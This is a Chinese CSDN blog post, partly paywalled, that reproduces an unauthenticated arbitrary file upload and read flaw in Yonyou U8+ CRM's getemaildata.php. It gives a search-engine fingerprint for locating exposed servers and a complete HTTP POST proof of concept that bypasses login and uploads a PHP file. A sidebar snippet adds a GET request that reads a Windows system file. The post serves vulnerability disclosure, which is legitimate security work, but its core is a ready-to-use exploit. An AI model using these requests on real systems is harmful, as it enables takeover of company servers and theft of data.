用友U8+CRM 任意文件上传+读取漏洞复现

已于 2023-08-16 07:47:31 修改
阅读量2.4k 收藏 3
点赞数 2
分类专栏: 漏洞复现 文章标签: 安全 web安全 网络安全
于 2023-08-13 20:56:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/132264738
版权

0x01 产品简介

      用友U8 CRM客户关系管理系统是一款专业的企业级CRM软件,旨在帮助企业高效管理客户关系、提升销售业绩和提供优质的客户服务。

0x02 漏洞概述

   用友 U8 CRM客户关系管理系统 getemaildata.php 文件存在任意文件上传和任意文件读取漏洞,攻击者通过漏洞可以获取到服务器权限。

0x03 复现环境

鹰图指纹:web.body="用友U8CRM"

35afa0e8e728439f93031bc036fc725a.png

0x04 漏洞复现 

 文件上传PoC

POST /ajax/getemaildata.php?DontCheckLogin=1 HTTP/1.1
Host:your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykS5RKgl8t3nwInMQ

------WebKitFormBoundarykS5RKgl8t3nwInMQ
Content-Disposition: form-data; name="file"; filename="a.php "
Content-Type: text/plain

<?php phpinfo();?>
------WebKitFormBoundarykS5RKgl8t3nwInMQ

了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
用友U8+CRM 逻辑漏洞登录后台漏洞
0xSec
01-06 1087
用友 U8 CRM客户关系管理系统reservationcomplete.php文件存在逻辑漏洞,未授权的攻击者通过漏洞可以直接登录后台,获取系统内部敏感信息,使系统处于极不安全状态。
用友U8 CRM管理
12-19
掌握CRM基础设置; 掌握客户管理; 掌握销售自动化; 掌握市场管理。
用友U8+ CRM目录遍历漏洞
m0_69931798的博客
10-18 249
或者将补丁压缩包中updateApConf.cmd放到U8SOFT\turbocrm70\apache\conf目录下执行,执行完之后在u8应用管理中重启apache服务。可以修改配置文件,即修改apache配置,将Options Indexes FollowSymLinks修改为Options FollowSymLinks,不在允许列出目录。漏洞影响U8 V16.5, V16.1, V16.0, V15.1, V15.0, V13版本。用友U8+CRM存在目录遍历漏洞,攻击者可利用该漏洞获取敏感信息。
用友U8CRM系统help2 任意文件读取漏洞
fly夏天的博客
12-23 559
用友U8+CRM系统的help2文件中接口存在任意文件读取漏洞,攻击者在未登录情况下即可进行漏洞利用。本文了这个漏洞并提供了进一步获取系统敏感文件的方法。
用友U8CRM后台维护以及打印模板设置操作手册
06-28
专注于用友软件的使用服务,以及问题处理,该手册为工作中个人编写,分享给大家,共同学习使用。
用友U8+ CRM任意文件任意文件读取 实战
m0_43397796的博客
02-24 1925
用友CRM系统,使用量非常广,这里存在任意文件读取漏洞任意文件漏洞
用友U8 crm客户关系管理存在任意文件漏洞
holyxp的博客
09-27 473
用友U8客户关系管理全面解决方案是基于中国企业最佳营销管理实践,更符合中国企业营销管理特点,客户关系管理的整合营销平台。产品融合数年来积累的知识、方法和经验,目标是帮助企业有效获取商机、提升营销能力。
用友U8 CRM客户关系管理任意文件漏洞【附POC】
薛定谔嘚喵博客
09-27 244
用友U8客户关系管理全面解决方案是基于中国企业最佳营销管理实践,更符合中国企业营销管理特点,客户关系管理的整合营销平台。产品融合数年来积累的知识、方法和经验,目标是帮助企业有效获取商机、提升营销能力。 用友U8 crm客户关系管理 ajax/getemaildata.php任意文件漏洞
用友u8CRM 日志信息泄露 漏洞_12
fushuang333的博客
01-08 533
用友u8CRM 日志信息泄露,U8是一款专为代理销售服务行业设计的集CRM、呼叫中心、OA核心应用于一体,提供前端营销、后端业务处理及员工管理一体化应用的管理软件。
用友GRP-U8 存在任意文件漏洞
holyxp的博客
07-26 1756
用友GRP-U8是面向政府及行政事业单位的财政管理应用。
用友U8+标准介绍.ppt
03-22
用友U8+标准介绍.ppt
用友U8+13.0数据字典.zip
08-26
用友U8 库表结构
最新的用友U8+V16.0全产品报价单.xlsx
09-25
最新的用友U8+V16.0全产品报价单,这个是V16.0的版本,最新的用友U8+V16.0全产品报价单,这个是V16.0的版本,
用友ERP软件U8+v16.1操作手册
04-20
用友ERP软件U8+v16.1操作手册,学习U8+的必备资料
用友U8+V12.0公共插件V7.5安装程序.rar
12-30
插件包含:宿舍管理,跨账套查询,固定资产条码,业务协调平台,运输管理 适用:用友U8v12.0
用友U8CRM help2.php 任意文件读取漏洞
01-23 467
用友U8CRM是一款针对代理销售服务行业设计的管理软件,它集客户关系管理(CRM)、呼叫中心和办公自动化(OA)核心应用于一体,提供前端营销、后端业务处理及员工管理的一体化解决方案。
用友U8 CRM系统help2 任意文件读取漏洞(1day)
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
12-20 565
U8+CRM》是一款专为代理销售服务行业设计的集CRM、呼叫中心、OA核心应用于一体,提供前端营销、后端业务处理及员工管理一体化应用的管理软件。软件立足代理销售服务行业管理一体化的高度,以“整合、专业、智能、畅捷”为产品研发理念,弥补了代理销售服务行业信息化管理的空白,为其经营管理的腾飞注入了强大的力量!技术平台采用JAVA跨平台BS应用开发技架构,支持 SQL Server数据库,支持Chrome、 Firefox等各种主流浏览器应用。
漏洞-某友CRM系统某接口存在任意文件读取(附漏洞检测脚本)
jjjj1029056414的博客
12-18 624
漏洞-某友CRM系统某接口存在任意文件读取,附带自己写的poc脚本
用友U8+CRM 任意文件读取漏洞
m0_69931798的博客
10-18 166
poc:burp 抓包 get 请求 GET /ajax/getemaildata.php?DontCheckLogin=1&filePath=c:/windows/win.ini 替换即可。getemaildata.php 文件存在任意文件任意文件读取漏洞,本文 只 任意文件读取。body="用友U8CRM"
用友U8+应收核销明细表
最新发布
02-23
用友U8+是一款企业管理软件,其中包含了应收核销明细表功能。应收核销明细表是用于记录企业在销售过程中的应收账款核销情况的报表。 在用友U8+中,可以通过以下步骤来使用应收核销明细表功能: 1. 登录用友U8+系统,进入财务管理模块。 2. 在财务管理模块中,找到并点击“应收管理”或类似的菜单项。 3. 在应收管理菜单中,选择“应收核销明细表”或类似的选项。 4. 进入应收核销明细表页面后,可以根据需要设置查询条件,如日期范围、客户名称等。 5. 点击查询按钮,系统将根据设置的条件查询并显示符合条件的应收核销明细数据。 6. 在应收核销明细表中,可以查看每笔核销的详细信息,包括核销日期、核销金额、客户名称、销售订单号等。 7. 可以根据需要导出或打印应收核销明细表,以便进行进一步的分析和处理。 使用用友U8+的应收核销明细表功能,可以方便地跟踪和管理企业的应收账款核销情况,帮助企业实更好的财务管理和控制。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值